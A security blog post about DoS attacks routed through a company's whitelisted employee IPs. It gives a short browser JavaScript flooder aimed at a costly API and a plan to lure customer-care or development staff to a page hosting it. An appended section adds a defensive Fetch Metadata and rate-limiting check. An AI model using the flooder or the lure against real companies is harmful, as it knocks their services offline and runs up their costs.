DoS attack via Trusted network

Typically, every tech company has firewalls, WAFs and rate-limiting load balancers configured, each with its chosen algorithm, to protect its website from simple DoS attacks.

For any product-based web company, up-time is a vital factor, as it decides the company's revenue in many ways. Once a site is down, or all of its servers are filled with malicious requests, then depending on how well it scales this can cause numerous losses:
1. Regular customers are lost, because it is irritating to buy anything on a slow website
2. New customers cannot register
3. Payments and orders can be cancelled
4. A lot of cloud computing resources are consumed, which causes a huge bill
5. Overall, it affects the company's reputation

Hence up-time is a very serious factor for many product-based web companies, and they configure their servers to stop any DoS-based attacks.

But in any company, the two main departments involved with the product are the Customer Care and Development teams. For both of these teams, their IP addresses are whitelisted so that they can be more productive while working. When these IP addresses are whitelisted, their requests bypass the WAF and directly hit the backend servers and databases.

In this case, they can easily attack the servers and bring them down. But obviously they are employees of the company and would easily be caught if they did anything malicious, so they won't do it. It is still possible, however, for their systems to be compromised and for hackers to attack through those systems.

Compromising an employee's system via trojans or viruses is very difficult, as all of their systems have professional anti-virus software installed and are monitored continuously. So this is where a DoS attack can be done by using the power of JavaScript.

A simple piece of JavaScript that makes thousands of requests to any high-resource-consuming API of their product can bring the servers down within a few seconds to minutes. No anti-virus or firewall will stop these requests, because they are made by the browser and come from the trusted network (a whitelisted IP). We just need to send a link to one simple HTML file to the employee while he is in his office, by chat or by posting that link in a tweet to their customer care Twitter account.

The link doesn't look suspicious; it could be a blog post with this injected JavaScript. The following JavaScript works pretty well to attack any company via its trusted network:

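function my_dos() {
    var TARGET = '';  // target origin is left empty in the original post
    var rand = Math.floor(Math.random() * 1000);  // random value for the t parameter
    var URI = '/api/resource/get?t=';
    var pic = new Image();
    pic.src = TARGET + URI + rand;  // setting src makes the browser issue a GET request
    setInterval(my_dos, 10);
}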
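
A defensive counterpart to the script above, as an added example that is not part of the original post: a server-side check that applies Fetch Metadata filtering and a per-IP token bucket to requests from whitelisted addresses as well. The function names, thresholds and sample requests are assumptions made for illustration.

```javascript
// Added example, not from the original post. Names and thresholds are assumptions.
function createGuard({ burst = 20, refillPerSec = 5 } = {}) {
  const buckets = new Map(); // source IP -> { tokens, last }

  // Fetch Metadata: a cross-site <img> load arrives with Sec-Fetch-Site: cross-site
  // and Sec-Fetch-Dest: image, which an API endpoint never legitimately receives.
  function crossSiteSubresource(h) {
    if (h['sec-fetch-site'] !== 'cross-site') return false; // same-site or old client
    const navigation = h['sec-fetch-mode'] === 'navigate' && h['sec-fetch-dest'] === 'document';
    return !navigation;
  }

  // Token bucket per source IP, applied to allowlisted IPs as well, so a
  // trusted address cannot send unbounded traffic to the backend.
  function takeToken(ip, nowMs) {
    const b = buckets.get(ip) || { tokens: burst, last: nowMs };
    b.tokens = Math.min(burst, b.tokens + ((nowMs - b.last) / 1000) * refillPerSec);
    b.last = nowMs;
    buckets.set(ip, b);
    if (b.tokens < 1) return false;
    b.tokens -= 1;
    return true;
  }

  return function check(req, nowMs = Date.now()) {
    if (crossSiteSubresource(req.headers)) return { allow: false, reason: 'cross-site-subresource' };
    if (!takeToken(req.ip, nowMs)) return { allow: false, reason: 'rate-limited' };
    return { allow: true, reason: 'ok' };
  };
}

// Constructed sample requests from one allowlisted office IP (documentation range).
function demo() {
  const check = createGuard({ burst: 3, refillPerSec: 1 });
  const ip = '203.0.113.10';
  const imgLoad = { ip, headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'image' } };
  const apiCall = { ip, headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' } };
  const results = [check(imgLoad, 0).reason];
  for (let i = 0; i < 4; i++) results.push(check(apiCall, 0).reason);
  results.push(check(apiCall, 2000).reason); // two seconds later, tokens have refilled
  return results;
}

console.log(demo());
```

Requests that carry no Sec-Fetch-* headers (older browsers, non-browser clients) are not rejected by the first check, so the token bucket remains the backstop for them.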